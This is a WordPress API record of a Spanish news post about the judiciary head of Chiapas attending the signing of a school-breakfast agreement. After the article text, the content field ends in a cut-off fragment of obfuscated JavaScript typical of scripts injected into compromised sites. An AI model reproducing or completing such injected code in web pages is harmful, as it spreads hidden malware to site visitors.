{"id":19984,"date":"2025-01-23T03:34:51","date_gmt":"2025-01-23T03:34:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19984"},"modified":"2025-01-23T03:34:52","modified_gmt":"2025-01-23T03:34:52","slug":"asiste-moreno-guillen-a-la-firma-del-acuerdo-de-desayunos-escolares-en-pro-de-la-ninez-chiapaneca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19984","title":{"rendered":"Asiste Moreno Guill\u00e9n a la firma del acuerdo de desayunos escolares en pro de la ni\u00f1ez chiapaneca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-1024x681.jpg\" alt=\"\" class=\"wp-image-19985\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250122-WA0024-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>22 de enero del 2025. Tuxtla Guti\u00e9rrez.-El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 a la firma del Contrato de Mandato de Desayunos Escolares, encabezada por el gobernador Eduardo Ram\u00edrez Aguilar, y la directora general del DIF Estatal, Ana Isabel Granda Gonz\u00e1lez, en el Centro de Convenciones de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>\u201cEs primordial que nuestras ni\u00f1as y ni\u00f1os tengan acceso a alimentos nutritivos y balanceados, que les permitan crecer sanos y fuertes. Adem\u00e1s, se verificar\u00e1 que cada producto cumpla con los est\u00e1ndares de calidad y nutrici\u00f3n que nuestros infantes merecen\u201d, enfatiz\u00f3 Ram\u00edrez Aguilar, acompa\u00f1ado de la se\u00f1ora Sof\u00eda Espinoza Abarca.<\/p>\n\n\n\n<p>En el marco de esta firma, el magistrado presidente enfatiz\u00f3 que este tipo de acciones representan un claro ejemplo de como el trabajo conjunto entre instituciones es esencial para atender los derechos fundamentales de nuestras ni\u00f1as y ni\u00f1os, garantizando su bienestar desde un enfoque humanista.<\/p>\n\n\n\n<p>Acompa\u00f1ado de su esposa, la presidenta del Voluntariado del Poder Judicial, Dalal Jehan Rabban Castell, Moreno Guill\u00e9n reiter\u00f3 su compromiso con la nueva era de la justicia en Chiapas, y asegur\u00f3 que se continuar\u00e1 trabajando en las acciones que promuevan la equidad, la justicia y el respeto a los derechos de las ni\u00f1as y ni\u00f1os chiapanecos.<\/p>\n\n\n\n<p>Este contrato marca un paso importante, donde servidoras y servidores del pueblo, as\u00ed como las y los alcaldes refrendan su compromiso por la construcci\u00f3n de un nuevo Chiapas, donde las y los ni\u00f1os de todos los rincones de la entidad, cuenten con la garant\u00eda de una alimentaci\u00f3n escolar digna y humanista.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 22 de enero del 2025. Tuxtla Guti\u00e9rrez.-El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 a la firma del Contrato de Mandato de Desayunos Escolares, encabezada por el gobernador Eduardo Ram\u00edrez Aguilar, y la directora general del DIF Estatal, Ana Isabel Granda Gonz\u00e1lez, en el Centro de Convenciones &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19985,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19984","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19984","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19984"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19984\/revisions"}],"predecessor-version":[{"id":19986,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19984\/revisions\/19986"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19985"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19984"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19984"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19984"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}